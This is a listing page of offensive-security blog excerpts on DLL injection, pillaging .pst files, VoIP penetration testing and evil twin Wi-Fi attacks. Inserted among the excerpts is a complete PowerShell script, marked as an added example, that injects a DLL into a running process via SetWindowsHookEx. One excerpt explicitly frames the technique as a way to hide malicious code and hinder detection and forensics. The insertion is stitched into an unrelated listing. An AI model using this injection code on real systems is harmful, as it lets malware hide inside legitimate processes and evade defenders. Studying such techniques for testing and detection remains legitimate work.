The goal of DLL injection is to load code into another running process' address space. So how exactly do we go about accomplishing that? It turns out there are a couple of ways to do so in Windows. We are first going to examine SetWindowsHookEx, a Windows API for installing hooks. If by the end of this post you are hungry for more, check out the references at the ...
Offense
Pillaging .pst Files
This post originally proposed using the open-source Java program Xena and its included plugin for converting .pst files into a searchable format. It still references Xena, but has been updated to reflect a simpler approach. On a recent engagement we were able to quickly compromise a client's network thanks to NetBIOS spoofing and easily cracked passwords. Of course, the ...
DLL Injection Part 0: Understanding DLL Usage
As a result of my foray into static malware analysis, I decided I needed a better understanding of DLL injection. DLL injection allows us to run code inside another process. This is useful because it lets us hide malicious code inside other, benign processes. Depending on the technique used, it can also mean not having to write anything to disk, making detection and forensics that much more difficult. This ...
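The two DLL injection excerpts above describe the idea (run our code inside another process) and name the first method the series examines, SetWindowsHookEx. The following script is an added example, not code from the original posts: it performs classic SetWindowsHookEx injection from PowerShell. Everything environment-specific is assumed, since the posts do not state it: the hook DLL is at C:\lab\hook.dll, it exports a hook procedure named HookProc, and the target is a running notepad.exe with a visible window. The DLL, the target process and the PowerShell host must all be the same bitness.

```powershell
# Added example (not from the original posts): SetWindowsHookEx DLL injection.
# Assumptions: hook DLL path, export name and target process are all hypothetical.
$DllPath    = 'C:\lab\hook.dll'   # assumed: DLL whose DllMain does the work
$ExportName = 'HookProc'          # assumed: exported hook procedure in that DLL
$TargetName = 'notepad'           # assumed: target process with a GUI thread

# P/Invoke signatures for the Win32 calls the technique needs.
$Win32 = @'
using System;
using System.Runtime.InteropServices;
public static class Win32 {
    [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Unicode)]
    public static extern IntPtr LoadLibrary(string lpFileName);
    [DllImport("kernel32.dll", SetLastError=true, CharSet=CharSet.Ansi, ExactSpelling=true)]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("user32.dll", SetLastError=true)]
    public static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
    [DllImport("user32.dll", SetLastError=true)]
    public static extern IntPtr SetWindowsHookEx(int idHook, IntPtr lpfn, IntPtr hMod, uint dwThreadId);
    [DllImport("user32.dll", SetLastError=true)]
    public static extern bool PostThreadMessage(uint idThread, uint Msg, IntPtr wParam, IntPtr lParam);
    [DllImport("user32.dll", SetLastError=true)]
    public static extern bool UnhookWindowsHookEx(IntPtr hhk);
}
'@
Add-Type -TypeDefinition $Win32

$WH_GETMESSAGE = 3   # hook type that fires whenever the hooked thread pumps a message
$WM_NULL       = 0   # harmless message used only to make the thread pump once

# 1. Map the hook DLL into our own process so the export can be resolved.
#    SetWindowsHookEx needs the DLL's module handle and the procedure address.
$hMod = [Win32]::LoadLibrary($DllPath)
if ($hMod -eq [IntPtr]::Zero) {
    throw "LoadLibrary failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
}
$pHookProc = [Win32]::GetProcAddress($hMod, $ExportName)
if ($pHookProc -eq [IntPtr]::Zero) { throw "Export $ExportName not found in $DllPath" }

# 2. Find the thread that owns the target's main window. Hooks are installed
#    per thread, and only threads with a message loop will ever trigger one.
$proc = Get-Process -Name $TargetName -ErrorAction Stop |
        Where-Object { $_.MainWindowHandle -ne 0 } | Select-Object -First 1
if (-not $proc) { throw "No $TargetName process with a window was found" }
[uint32]$targetPid = 0
$threadId = [Win32]::GetWindowThreadProcessId($proc.MainWindowHandle, [ref]$targetPid)

# 3. Install the hook. Windows maps $DllPath into the target process the first
#    time the hooked thread receives a message, running the DLL's DllMain there.
$hHook = [Win32]::SetWindowsHookEx($WH_GETMESSAGE, $pHookProc, $hMod, $threadId)
if ($hHook -eq [IntPtr]::Zero) {
    throw "SetWindowsHookEx failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
}

# 4. Force the load now rather than waiting for the user to touch the window.
[void][Win32]::PostThreadMessage($threadId, $WM_NULL, [IntPtr]::Zero, [IntPtr]::Zero)
Start-Sleep -Milliseconds 500

# 5. Verify from the outside: the DLL should now be in the target's module list.
$loaded = (Get-Process -Id $targetPid).Modules | Where-Object { $_.FileName -eq $DllPath }
if ($loaded) { "Injected $($loaded.FileName) into PID $targetPid (thread $threadId)" }
else         { "DLL not loaded in PID $targetPid; does the thread pump messages?" }

# 6. Remove the hook. Once it is gone the system unmaps the DLL from the target
#    the next time that thread runs the hook chain, so the DLL must have done
#    its work (or started its own thread) from DllMain.
[void][Win32]::UnhookWindowsHookEx($hHook)
```

Two caveats a practitioner will hit: the hook only fires for threads that process window messages, so console-only targets never load the DLL, and the DLL must be on disk at a path the target can read, which is exactly why this classic method is easy to spot in module listings and image-load telemetry.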
VoIP Penetration Testing: Introduction
I've had a number of recent opportunities to conduct VoIP-focused penetration tests. Prior to my first, I noticed that tutorials, blogs and training write-ups on the subject were pretty scarce. So, I figured it might be helpful to have all of it in one place. In this short blog series, I'll cover the goals, methodology, and tools needed to conduct a successful VoIP penetration ...
Evil Twin Attack Using hostapd-wpe
The Evil Twin Attack has been around for some time. In the past, whenever we ran across WPA/2-Enterprise wireless networks on assessments, we'd break out a separate router and sit in a parking lot or lunch room waiting for victims to pass. The attack was simple, but the setup was overly complicated and left us tied to a power outlet. Fortunately, all that is in the past. A ...
Understanding Radio Frequency Theory
I did a short series on attacking Wi-Fi for my personal blog last year, but I did not cover Enterprise Wireless. A few interesting tools have been released in the time that has passed, so I'm going to steal some of my own words as a short lead-in to a new post on conducting attacks against WPA/2-Enterprise wireless networks. The Spectrum: Electromagnetic energy is the basis on ...
The Importance of Understanding Your Tools
There are many qualities and skills necessary to be an effective penetration tester. Experience with a programming language or two is right at the top of that list. I don't mean that you need to have a development background. Successful attackers should, however, be able to look at the tools and exploits they use and understand how they actually work. This exact issue came up on a ...